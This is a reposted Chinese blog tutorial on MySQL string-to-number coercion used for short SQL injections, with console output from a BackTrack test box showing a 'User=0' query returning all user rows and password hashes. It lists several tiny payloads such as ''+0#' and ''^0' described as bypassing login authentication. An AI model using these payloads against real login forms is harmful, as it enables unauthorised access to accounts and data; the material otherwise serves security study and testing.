當(dāng)前位置：首頁 > 运维知识 > 数据库 >内容正文

数据库

Abusing MySQL string arithmetic for tiny SQL injections

發(fā)布時(shí)間：2024/1/1 数据库 41 豆豆

生活随笔收集整理的這篇文章主要介紹了 Abusing MySQL string arithmetic for tiny SQL injections 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

測試平臺:????backtrack r3x86
MYSQL版本：? mysql-5.1.63

mysql> select User,Password from user where User=0;
+------------------+-------------------------------------------+
| User???????????? | Password????????????????????????????????? |
+------------------+-------------------------------------------+
| root???????????? | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root???????????? | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root???????????? | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| debian-sys-maint | *8C4C424D182238AFBA8B217F692D07C952EF4087 |
+------------------+-------------------------------------------+
4 rows in set, 4 warnings (0.00 sec)

mysql> select User,Password from user where User='';
Empty set (0.00 sec)

mysql> select User,Password from user where User=NULL;
Empty set (0.01 sec)

mysql> select 'w'-'w';
+---------+
| 'w'-'w' |
+---------+
|?????? 0 |
+---------+
1 row in set, 2 warnings (0.00 sec)

mysql> select "w"-"w";
+---------+
| "w"-"w" |
+---------+
|?????? 0 |
+---------+
1 row in set, 2 warnings (0.01 sec)

光看上面的warnings有人可能不信，特作下面的驗(yàn)證.

能完成數(shù)值類型轉(zhuǎn)換的表達(dá)式均可, 例如: select username,password from users where username= '' +0;

類似的”+0,”-0,”*0,”^0均可。精簡payload可以繞過登錄認(rèn)證：?‘+0#，’/1#，’^0，’-0#等等。

http://www.xaprb.com/blog/2008/08/13/how-to-emulate-the-typeof-function-in-mysql/
http://blog.kotowicz.net/2013/01/abusing-mysql-string-arithmetic-for.html
http://www.freebuf.com/articles/web/6894.html

總結(jié)

以上是生活随笔為你收集整理的Abusing MySQL string arithmetic for tiny SQL injections的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： IE8,9,10下table th不显示
下一篇： navicat数据库密码忘记如何解决